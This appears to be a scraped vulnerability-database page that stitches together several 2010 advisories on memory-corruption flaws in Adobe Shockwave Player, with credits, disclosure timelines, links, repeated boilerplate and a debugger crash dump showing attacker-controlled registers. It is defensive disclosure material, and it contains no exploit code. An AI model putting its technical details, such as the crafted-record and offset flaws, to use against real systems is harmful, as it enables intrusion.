9) Chaouki Bekrar of Vupen and an anonymous person working with ZDI.
10) Chaouki Bekrar of Vupen.
11-16) Chro HD of Fortinet's FortiGuard Labs.
CHANGELOG:
2010-05-12: Updated "Extended Description" and added PoCs for
vulnerabilities #2, #3, #4, and #6.
ORIGINAL ADVISORY:
Adobe:
http://www.adobe.com/support/security/bulletins/apsb10-12.html
Secunia Research:
http://secunia.com/secunia_research/2010-17/
http://secunia.com/secunia_research/2010-19/
http://secunia.com/secunia_research/2010-20/
http://secunia.com/secunia_research/2010-22/
http://secunia.com/secunia_research/2010-34/
http://secunia.com/secunia_research/2010-50/
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-087/
http://www.zerodayinitiative.com/advisories/ZDI-10-088/
http://www.zerodayinitiative.com/advisories/ZDI-10-089/
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=869
Code Audit Labs:
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0137.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0138.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0139.html
Zero Science Lab:
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4937.php
Core Security Technologies:
http://www.coresecurity.com/content/adobe-director-invalid-read
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. User
interaction is required in that a user must visit a malicious web site.
Exploitation can lead to remote system high cpu load ( infinite loop).
ref
http://hi.baidu.com/fs_fx/blog/item/f8de1d18ba8c9b76dbb4bd56.html
http://www.adobe.com/support/security/bulletins/apsb10-12.html
Disclosure Timeline
===================
2010-2-6 report to vendor
2010-2-7 vendor ask poc file
2010-2-7 we sent the poc file.
2010-2-8 vendor comfirm the issue.
2010-5-11 Coordinated public release of advisory.
About Code Audit Labs:
=====================
Code Audit Labs is department of VulnHunt company which provide a
professional security testing products / services / security consulting
and training ,we sincerely hope we can help your procudes to improve code
quality and safety.
WebSite http://www.VulnHunt.com ( online soon)
| VAR-201005-0084 | CVE-2010-0986 | Adobe Shockwave Player Vulnerable to arbitrary code execution |
CVSS V2: 9.3 CVSS V3: 8.8 Severity: HIGH |
Adobe Shockwave Player before 11.5.7.609 does not properly process asset entries, which allows remote attackers to cause a denial of service (memory corruption) or possibly execute arbitrary code via a crafted Shockwave file. Adobe Shockwave Player is prone to a remote code-execution vulnerability.
Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely result in denial-of-service conditions.
Adobe Shockwave Player 11.5.6.606 and prior are vulnerable.
NOTE: This issue was previously discussed in BID 40066 (Adobe Shockwave Player APSB10-12 Multiple Remote Vulnerabilities) but has been given its own record to better document it. The vulnerable software fails to sanitize user input when processing .dir files resulting in a crash and overwrite of a few memory registers.<br/><br/> --------------------------------------------------------------------------------<br/><br/><code> (f94.ae4): Access violation - code c0000005 (first chance)<br/> First chance exceptions are reported before any exception handling.<br/> This exception may be expected and handled.<br/> eax=20a0a0a0 ebx=207d004c ecx=00000400 edx=41414140 esi=00000000 edi=a80487d8<br/> eip=68008bd6 esp=0012de4c ebp=00000400 iopl=0 nv up ei pl nz na pe nc<br/> cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050206<br/> *** WARNING: Unable to verify checksum for C:\Program Files\Adobe\Adobe Director 11\DIRAPI.dll<br/> *** ERROR: Symbol file could not be found. Defaulted to export symbols for DIRAPI.dll - <br/> DIRAPI!Ordinal14+0x3b16:<br/> 68008bd6 2b4f04 sub ecx,dword ptr [edi+4] ds:0023:a80487dc=????????<br/><br/>-----------------------<br/><br/>EAX FFFFFFFF<br/>ECX 41414141<br/>EDX FFFFFFFF<br/>EBX 00000018<br/>ESP 0012F3B4<br/>EBP 02793578<br/>ESI 0012F3C4<br/>EDI 02793578<br/>EIP 69009F1F IML32.69009F1F<br/></code><br/>--------------------------------------------------------------------------------<br/><br/>Tested on: Microsoft Windows XP Professional SP3 (English). ----------------------------------------------------------------------
Looking for a job?
Secunia is hiring skilled researchers and talented developers.
1) A boundary error while processing FFFFFF45h Shockwave 3D blocks
can be exploited to corrupt memory.
2) A signedness error in the processing of Director files can be
exploited to corrupt memory.
3) An array indexing error when processing Director files can be
exploited to corrupt memory.
4) An integer overflow error when processing Director files can be
exploited to corrupt memory.
5) An error when processing asset entries contained in Director files
can be exploited to corrupt memory.
6) A boundary error when processing embedded fonts can be exploited
to cause a heap-based buffer overflow via a specially crafted
Director file.
7) An error when processing Director files can be exploited to
overwrite 4 bytes of memory.
8) An error in the implementation of ordinal function 1409 in
iml32.dll can be exploited to corrupt heap memory via a specially
crafted Director file.
9) An error when processing a 4-byte field inside FFFFFF49h Shockwave
3D blocks can be exploited to corrupt heap memory.
10) An unspecified error can be exploited to corrupt memory.
11) A second unspecified error can be exploited to corrupt memory.
12) A third unspecified error can be exploited to corrupt memory.
13) A fourth unspecified error can be exploited to cause a buffer
overflow.
14) A fifth unspecified error can be exploited to corrupt memory.
15) A sixth unspecified error can be exploited to corrupt memory.
16) A seventh unspecified error can be exploited to corrupt memory.
17) An error when processing signed values encountered while parsing
"pami" RIFF chunks can be exploited to corrupt memory.
Successful exploitation of the vulnerabilities may allow execution of
arbitrary code.
The vulnerabilities are reported in versions 11.5.6.606 and prior on
Windows and Macintosh.
SOLUTION:
Update to version 11.5.7.609.
http://get.adobe.com/shockwave/
PROVIDED AND/OR DISCOVERED BY:
1-6) Alin Rad Pop, Secunia Research
The vendor also credits:
2) Nahuel Riva of Core Security Technologies.
3) Chaouki Bekrar of Vupen, Code Audit Labs, and an anonymous person
working with iDefense.
7) Chaouki Bekrar and Sebastien Renaud of Vupen, Code Audit Labs,
Gjoko Krstic of Zero Science Lab, and Chro HD of Fortinet's
FortiGuard Labs.
8, 17) an anonymous person working with ZDI.
9) Chaouki Bekrar of Vupen and an anonymous person working with ZDI.
10) Chaouki Bekrar of Vupen.
11-16) Chro HD of Fortinet's FortiGuard Labs.
CHANGELOG:
2010-05-12: Updated "Extended Description" and added PoCs for
vulnerabilities #2, #3, #4, and #6.
ORIGINAL ADVISORY:
Adobe:
http://www.adobe.com/support/security/bulletins/apsb10-12.html
Secunia Research:
http://secunia.com/secunia_research/2010-17/
http://secunia.com/secunia_research/2010-19/
http://secunia.com/secunia_research/2010-20/
http://secunia.com/secunia_research/2010-22/
http://secunia.com/secunia_research/2010-34/
http://secunia.com/secunia_research/2010-50/
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-087/
http://www.zerodayinitiative.com/advisories/ZDI-10-088/
http://www.zerodayinitiative.com/advisories/ZDI-10-089/
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=869
Code Audit Labs:
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0137.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0138.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0139.html
Zero Science Lab:
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4937.php
Core Security Technologies:
http://www.coresecurity.com/content/adobe-director-invalid-read
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
.
======================================================================
2) Severity
Rating: Highly critical
Impact: System access
Where: From remote
======================================================================
3) Vendor's Description of Software
"Over 450 million Internet-enabled desktops have installed Adobe
Shockwave Player.
======================================================================
6) Time Table
17/03/2010 - Vendor notified.
17/03/2010 - Vendor response.
12/05/2010 - Public disclosure.
======================================================================
8) References
The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2010-0986 for the vulnerability.
======================================================================
9) About Secunia
Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:
http://secunia.com/advisories/business_solutions/
Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private
individuals, who are interested in or concerned about IT-security.
http://secunia.com/advisories/
Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the
security and reliability of software in general:
http://secunia.com/secunia_research/
Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:
http://secunia.com/corporate/jobs/
Secunia offers a FREE mailing list called Secunia Security Advisories:
http://secunia.com/advisories/mailing_lists/
======================================================================
10) Verification
Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2010-34/
Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/
======================================================================
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
| VAR-201005-0103 | CVE-2010-1283 | Adobe Shockwave Player Vulnerable to arbitrary code execution |
CVSS V2: 9.3 CVSS V3: 8.8 Severity: HIGH |
Adobe Shockwave Player before 11.5.7.609 does not properly parse 3D objects in .dir (aka Director) files, which allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via a modified field in a 0xFFFFFF49 record. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Shockwave. User interaction is required to exploit this vulnerability in that the target must visit a malicious page.The specific flaw exists within the code responsible for parsing 3D objects defined inside Director files. These files are essentially RIFF-based, but stored in big endian format. An undocumented 4-byte field within record type 0xFFFFFF49 can be modified to cause corruption of heap memory. This corruption can be used to modify function pointers and achieve remote code execution under the context of the user running the browser. Adobe Shockwave Player is prone to a memory-corruption vulnerability.
Adobe Shockwave Player 11.5.6.606 and prior are vulnerable.
NOTE: This issue was previously discussed in BID 40066 (Adobe Shockwave Player APSB10-12 Multiple Remote Vulnerabilities) but has been given its own record to better document it. The vulnerable software fails to sanitize user input when processing .dir files resulting in a crash and overwrite of a few memory registers.<br/><br/> --------------------------------------------------------------------------------<br/><br/><code> (f94.ae4): Access violation - code c0000005 (first chance)<br/> First chance exceptions are reported before any exception handling.<br/> This exception may be expected and handled.<br/> eax=20a0a0a0 ebx=207d004c ecx=00000400 edx=41414140 esi=00000000 edi=a80487d8<br/> eip=68008bd6 esp=0012de4c ebp=00000400 iopl=0 nv up ei pl nz na pe nc<br/> cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050206<br/> *** WARNING: Unable to verify checksum for C:\Program Files\Adobe\Adobe Director 11\DIRAPI.dll<br/> *** ERROR: Symbol file could not be found. Defaulted to export symbols for DIRAPI.dll - <br/> DIRAPI!Ordinal14+0x3b16:<br/> 68008bd6 2b4f04 sub ecx,dword ptr [edi+4] ds:0023:a80487dc=????????<br/><br/>-----------------------<br/><br/>EAX FFFFFFFF<br/>ECX 41414141<br/>EDX FFFFFFFF<br/>EBX 00000018<br/>ESP 0012F3B4<br/>EBP 02793578<br/>ESI 0012F3C4<br/>EDI 02793578<br/>EIP 69009F1F IML32.69009F1F<br/></code><br/>--------------------------------------------------------------------------------<br/><br/>Tested on: Microsoft Windows XP Professional SP3 (English). More
details can be found at:
http://www.adobe.com/support/security/bulletins/apsb10-12.html
-- Disclosure Timeline:
2010-03-12 - Vulnerability reported to vendor
2010-05-11 - Coordinated public release of advisory
-- Credit:
This vulnerability was discovered by:
* Anonymous
-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
Follow the ZDI on Twitter:
http://twitter.com/thezdi
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
. ----------------------------------------------------------------------
Looking for a job?
Secunia is hiring skilled researchers and talented developers.
1) A boundary error while processing FFFFFF45h Shockwave 3D blocks
can be exploited to corrupt memory.
2) A signedness error in the processing of Director files can be
exploited to corrupt memory.
3) An array indexing error when processing Director files can be
exploited to corrupt memory.
4) An integer overflow error when processing Director files can be
exploited to corrupt memory.
5) An error when processing asset entries contained in Director files
can be exploited to corrupt memory.
6) A boundary error when processing embedded fonts can be exploited
to cause a heap-based buffer overflow via a specially crafted
Director file.
7) An error when processing Director files can be exploited to
overwrite 4 bytes of memory.
8) An error in the implementation of ordinal function 1409 in
iml32.dll can be exploited to corrupt heap memory via a specially
crafted Director file.
10) An unspecified error can be exploited to corrupt memory.
11) A second unspecified error can be exploited to corrupt memory.
12) A third unspecified error can be exploited to corrupt memory.
13) A fourth unspecified error can be exploited to cause a buffer
overflow.
14) A fifth unspecified error can be exploited to corrupt memory.
15) A sixth unspecified error can be exploited to corrupt memory.
16) A seventh unspecified error can be exploited to corrupt memory.
17) An error when processing signed values encountered while parsing
"pami" RIFF chunks can be exploited to corrupt memory.
Successful exploitation of the vulnerabilities may allow execution of
arbitrary code.
The vulnerabilities are reported in versions 11.5.6.606 and prior on
Windows and Macintosh.
SOLUTION:
Update to version 11.5.7.609.
http://get.adobe.com/shockwave/
PROVIDED AND/OR DISCOVERED BY:
1-6) Alin Rad Pop, Secunia Research
The vendor also credits:
2) Nahuel Riva of Core Security Technologies.
3) Chaouki Bekrar of Vupen, Code Audit Labs, and an anonymous person
working with iDefense.
7) Chaouki Bekrar and Sebastien Renaud of Vupen, Code Audit Labs,
Gjoko Krstic of Zero Science Lab, and Chro HD of Fortinet's
FortiGuard Labs.
8, 17) an anonymous person working with ZDI.
9) Chaouki Bekrar of Vupen and an anonymous person working with ZDI.
10) Chaouki Bekrar of Vupen.
11-16) Chro HD of Fortinet's FortiGuard Labs.
CHANGELOG:
2010-05-12: Updated "Extended Description" and added PoCs for
vulnerabilities #2, #3, #4, and #6.
ORIGINAL ADVISORY:
Adobe:
http://www.adobe.com/support/security/bulletins/apsb10-12.html
Secunia Research:
http://secunia.com/secunia_research/2010-17/
http://secunia.com/secunia_research/2010-19/
http://secunia.com/secunia_research/2010-20/
http://secunia.com/secunia_research/2010-22/
http://secunia.com/secunia_research/2010-34/
http://secunia.com/secunia_research/2010-50/
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-087/
http://www.zerodayinitiative.com/advisories/ZDI-10-088/
http://www.zerodayinitiative.com/advisories/ZDI-10-089/
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=869
Code Audit Labs:
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0137.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0138.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0139.html
Zero Science Lab:
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4937.php
Core Security Technologies:
http://www.coresecurity.com/content/adobe-director-invalid-read
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. These people now have access to some of the best the Web has to
offer
including dazzling 3D games and entertainment, interactive product
demonstrations, and online learning applications. Shockwave Player displays
Web content that has been created by Adobe Director." from Adobe.com
II.
III. Binary Analysis & Proof-of-concept
---------------------------------------
In-depth binary analysis, code execution exploits and proof-of-concept
codes are published through the VUPEN Binary Analysis & Exploits Service :
http://www.vupen.com/exploits/
V. CREDIT
--------------
This vulnerability was discovered by Chaouki Bekrar of VUPEN Security
VII. ABOUT VUPEN Security
---------------------------
VUPEN is a leading IT security research company providing vulnerability
management and security intelligence solutions which enable enterprises
and institutions to eliminate vulnerabilities before they can be exploited,
ensure security policy compliance and meaningfully measure and manage risks.
Governmental and federal agencies, and global enterprises in the financial
services, insurance, manufacturing and technology industries rely on VUPEN
to improve their security, prioritize resources, cut time and costs, and
stay ahead of the latest threats.
* VUPEN Vulnerability Notification Service:
http://www.vupen.com/english/services/
* VUPEN Binary Analysis & Exploits Service :
http://www.vupen.com/exploits/
* VUPEN Web Application Security Scanner (WASS):
http://www.vupen.com/english/wass/
VIII. REFERENCES
----------------------
http://www.vupen.com/english/advisories/2010/1128
http://www.adobe.com/support/security/bulletins/apsb10-12.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1283
IX. DISCLOSURE TIMELINE
-----------------------------
2010-02-24 - Vendor notified
2010-02-24 - Vendor response
2010-03-02 - Status update received
2010-05-07 - Status update received
2010-05-12 - Coordinated public Disclosure
| VAR-201005-0085 | CVE-2010-0987 | Adobe Shockwave Player Heap-based buffer overflow vulnerability |
CVSS V2: 9.3 CVSS V3: 8.8 Severity: HIGH |
Heap-based buffer overflow in Adobe Shockwave Player before 11.5.7.609 might allow remote attackers to execute arbitrary code via crafted embedded fonts in a Shockwave file. Adobe Shockwave Player is prone to a buffer-overflow vulnerability.
Attackers can exploit this issue to crash the affected application and execute arbitrary code within the context of the affected application.
Adobe Shockwave Player 11.5.6.606 and prior are vulnerable.
NOTE: This issue was previously discussed in BID 40066 (Adobe Shockwave Player APSB10-12 Multiple Remote Vulnerabilities) but has been given its own record to better document it. The vulnerable software fails to sanitize user input when processing .dir files resulting in a crash and overwrite of a few memory registers.<br/><br/> --------------------------------------------------------------------------------<br/><br/><code> (f94.ae4): Access violation - code c0000005 (first chance)<br/> First chance exceptions are reported before any exception handling.<br/> This exception may be expected and handled.<br/> eax=20a0a0a0 ebx=207d004c ecx=00000400 edx=41414140 esi=00000000 edi=a80487d8<br/> eip=68008bd6 esp=0012de4c ebp=00000400 iopl=0 nv up ei pl nz na pe nc<br/> cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050206<br/> *** WARNING: Unable to verify checksum for C:\Program Files\Adobe\Adobe Director 11\DIRAPI.dll<br/> *** ERROR: Symbol file could not be found. Defaulted to export symbols for DIRAPI.dll - <br/> DIRAPI!Ordinal14+0x3b16:<br/> 68008bd6 2b4f04 sub ecx,dword ptr [edi+4] ds:0023:a80487dc=????????<br/><br/>-----------------------<br/><br/>EAX FFFFFFFF<br/>ECX 41414141<br/>EDX FFFFFFFF<br/>EBX 00000018<br/>ESP 0012F3B4<br/>EBP 02793578<br/>ESI 0012F3C4<br/>EDI 02793578<br/>EIP 69009F1F IML32.69009F1F<br/></code><br/>--------------------------------------------------------------------------------<br/><br/>Tested on: Microsoft Windows XP Professional SP3 (English).
======================================================================
2) Severity
Rating: Highly critical
Impact: System access
Where: From remote
======================================================================
3) Vendor's Description of Software
"Over 450 million Internet-enabled desktops have installed Adobe
Shockwave Player.
======================================================================
6) Time Table
23/03/2010 - Vendor notified.
23/03/2010 - Vendor response.
12/05/2010 - Public disclosure.
======================================================================
8) References
The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2010-0987 for the vulnerability.
======================================================================
9) About Secunia
Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:
http://secunia.com/advisories/business_solutions/
Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private
individuals, who are interested in or concerned about IT-security.
http://secunia.com/advisories/
Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the
security and reliability of software in general:
http://secunia.com/secunia_research/
Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:
http://secunia.com/corporate/jobs/
Secunia offers a FREE mailing list called Secunia Security Advisories:
http://secunia.com/advisories/mailing_lists/
======================================================================
10) Verification
Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2010-50/
Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/
======================================================================
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
. ----------------------------------------------------------------------
Looking for a job?
Secunia is hiring skilled researchers and talented developers.
1) A boundary error while processing FFFFFF45h Shockwave 3D blocks
can be exploited to corrupt memory.
2) A signedness error in the processing of Director files can be
exploited to corrupt memory.
3) An array indexing error when processing Director files can be
exploited to corrupt memory.
4) An integer overflow error when processing Director files can be
exploited to corrupt memory.
5) An error when processing asset entries contained in Director files
can be exploited to corrupt memory.
7) An error when processing Director files can be exploited to
overwrite 4 bytes of memory.
8) An error in the implementation of ordinal function 1409 in
iml32.dll can be exploited to corrupt heap memory via a specially
crafted Director file.
9) An error when processing a 4-byte field inside FFFFFF49h Shockwave
3D blocks can be exploited to corrupt heap memory.
10) An unspecified error can be exploited to corrupt memory.
11) A second unspecified error can be exploited to corrupt memory.
12) A third unspecified error can be exploited to corrupt memory.
13) A fourth unspecified error can be exploited to cause a buffer
overflow.
14) A fifth unspecified error can be exploited to corrupt memory.
15) A sixth unspecified error can be exploited to corrupt memory.
16) A seventh unspecified error can be exploited to corrupt memory.
17) An error when processing signed values encountered while parsing
"pami" RIFF chunks can be exploited to corrupt memory.
Successful exploitation of the vulnerabilities may allow execution of
arbitrary code.
The vulnerabilities are reported in versions 11.5.6.606 and prior on
Windows and Macintosh.
SOLUTION:
Update to version 11.5.7.609.
http://get.adobe.com/shockwave/
PROVIDED AND/OR DISCOVERED BY:
1-6) Alin Rad Pop, Secunia Research
The vendor also credits:
2) Nahuel Riva of Core Security Technologies.
3) Chaouki Bekrar of Vupen, Code Audit Labs, and an anonymous person
working with iDefense.
7) Chaouki Bekrar and Sebastien Renaud of Vupen, Code Audit Labs,
Gjoko Krstic of Zero Science Lab, and Chro HD of Fortinet's
FortiGuard Labs.
8, 17) an anonymous person working with ZDI.
9) Chaouki Bekrar of Vupen and an anonymous person working with ZDI.
10) Chaouki Bekrar of Vupen.
11-16) Chro HD of Fortinet's FortiGuard Labs.
CHANGELOG:
2010-05-12: Updated "Extended Description" and added PoCs for
vulnerabilities #2, #3, #4, and #6.
ORIGINAL ADVISORY:
Adobe:
http://www.adobe.com/support/security/bulletins/apsb10-12.html
Secunia Research:
http://secunia.com/secunia_research/2010-17/
http://secunia.com/secunia_research/2010-19/
http://secunia.com/secunia_research/2010-20/
http://secunia.com/secunia_research/2010-22/
http://secunia.com/secunia_research/2010-34/
http://secunia.com/secunia_research/2010-50/
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-087/
http://www.zerodayinitiative.com/advisories/ZDI-10-088/
http://www.zerodayinitiative.com/advisories/ZDI-10-089/
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=869
Code Audit Labs:
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0137.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0138.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0139.html
Zero Science Lab:
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4937.php
Core Security Technologies:
http://www.coresecurity.com/content/adobe-director-invalid-read
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201005-0101 | CVE-2010-1281 | Adobe Shockwave Player of iml32.dll Vulnerable to arbitrary code execution |
CVSS V2: 9.3 CVSS V3: 8.8 Severity: HIGH |
iml32.dll in Adobe Shockwave Player before 11.5.7.609 does not validate a certain value from a file before using it in file-pointer calculations, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted .dir (aka Director) file. User interaction is required in that a target visit a malicious website.The specific flaw exists within the code responsible for parsing Director files. The vulnerable function is exported as an ordinal from the iml32.dll module. Ordinal 1409 trusts a value from the file as an offset and updates pointers accordingly. By crafting a large enough value and seeking the file pointer past the end of a buffer this can be abused to corrupt heap memory. An attacker can abuse this to execute arbitrary code under the context of the user running the browser. Failed exploit attempts may cause a denial-of-service condition.
Versions prior to Shockwave Player 11.5.7.609 are vulnerable.
Note: This issue was previously covered in BID 40066 (Adobe Shockwave Player APSB10-12 Multiple Remote Vulnerabilities); it has been given its own record to better document it. Over 450 million Internet-enabled desktops have installed Adobe Shockwave Player. These people now have access to some of the best the Web has to offer - including dazzling 3D games and entertainment, interactive product demonstrations, and online learning applications. The vulnerable software fails to sanitize user input when processing .dir files resulting in a crash and overwrite of a few memory registers.<br/><br/> --------------------------------------------------------------------------------<br/><br/><code> (f94.ae4): Access violation - code c0000005 (first chance)<br/> First chance exceptions are reported before any exception handling.<br/> This exception may be expected and handled.<br/> eax=20a0a0a0 ebx=207d004c ecx=00000400 edx=41414140 esi=00000000 edi=a80487d8<br/> eip=68008bd6 esp=0012de4c ebp=00000400 iopl=0 nv up ei pl nz na pe nc<br/> cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050206<br/> *** WARNING: Unable to verify checksum for C:\Program Files\Adobe\Adobe Director 11\DIRAPI.dll<br/> *** ERROR: Symbol file could not be found. Defaulted to export symbols for DIRAPI.dll - <br/> DIRAPI!Ordinal14+0x3b16:<br/> 68008bd6 2b4f04 sub ecx,dword ptr [edi+4] ds:0023:a80487dc=????????<br/><br/>-----------------------<br/><br/>EAX FFFFFFFF<br/>ECX 41414141<br/>EDX FFFFFFFF<br/>EBX 00000018<br/>ESP 0012F3B4<br/>EBP 02793578<br/>ESI 0012F3C4<br/>EDI 02793578<br/>EIP 69009F1F IML32.69009F1F<br/></code><br/>--------------------------------------------------------------------------------<br/><br/>Tested on: Microsoft Windows XP Professional SP3 (English). ----------------------------------------------------------------------
Looking for a job?
Secunia is hiring skilled researchers and talented developers.
1) A boundary error while processing FFFFFF45h Shockwave 3D blocks
can be exploited to corrupt memory.
2) A signedness error in the processing of Director files can be
exploited to corrupt memory.
3) An array indexing error when processing Director files can be
exploited to corrupt memory.
4) An integer overflow error when processing Director files can be
exploited to corrupt memory.
5) An error when processing asset entries contained in Director files
can be exploited to corrupt memory.
6) A boundary error when processing embedded fonts can be exploited
to cause a heap-based buffer overflow via a specially crafted
Director file.
7) An error when processing Director files can be exploited to
overwrite 4 bytes of memory.
9) An error when processing a 4-byte field inside FFFFFF49h Shockwave
3D blocks can be exploited to corrupt heap memory.
10) An unspecified error can be exploited to corrupt memory.
11) A second unspecified error can be exploited to corrupt memory.
12) A third unspecified error can be exploited to corrupt memory.
13) A fourth unspecified error can be exploited to cause a buffer
overflow.
14) A fifth unspecified error can be exploited to corrupt memory.
15) A sixth unspecified error can be exploited to corrupt memory.
16) A seventh unspecified error can be exploited to corrupt memory.
17) An error when processing signed values encountered while parsing
"pami" RIFF chunks can be exploited to corrupt memory.
Successful exploitation of the vulnerabilities may allow execution of
arbitrary code.
SOLUTION:
Update to version 11.5.7.609.
http://get.adobe.com/shockwave/
PROVIDED AND/OR DISCOVERED BY:
1-6) Alin Rad Pop, Secunia Research
The vendor also credits:
2) Nahuel Riva of Core Security Technologies.
3) Chaouki Bekrar of Vupen, Code Audit Labs, and an anonymous person
working with iDefense.
7) Chaouki Bekrar and Sebastien Renaud of Vupen, Code Audit Labs,
Gjoko Krstic of Zero Science Lab, and Chro HD of Fortinet's
FortiGuard Labs.
8, 17) an anonymous person working with ZDI.
9) Chaouki Bekrar of Vupen and an anonymous person working with ZDI.
10) Chaouki Bekrar of Vupen.
11-16) Chro HD of Fortinet's FortiGuard Labs.
CHANGELOG:
2010-05-12: Updated "Extended Description" and added PoCs for
vulnerabilities #2, #3, #4, and #6.
ORIGINAL ADVISORY:
Adobe:
http://www.adobe.com/support/security/bulletins/apsb10-12.html
Secunia Research:
http://secunia.com/secunia_research/2010-17/
http://secunia.com/secunia_research/2010-19/
http://secunia.com/secunia_research/2010-20/
http://secunia.com/secunia_research/2010-22/
http://secunia.com/secunia_research/2010-34/
http://secunia.com/secunia_research/2010-50/
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-087/
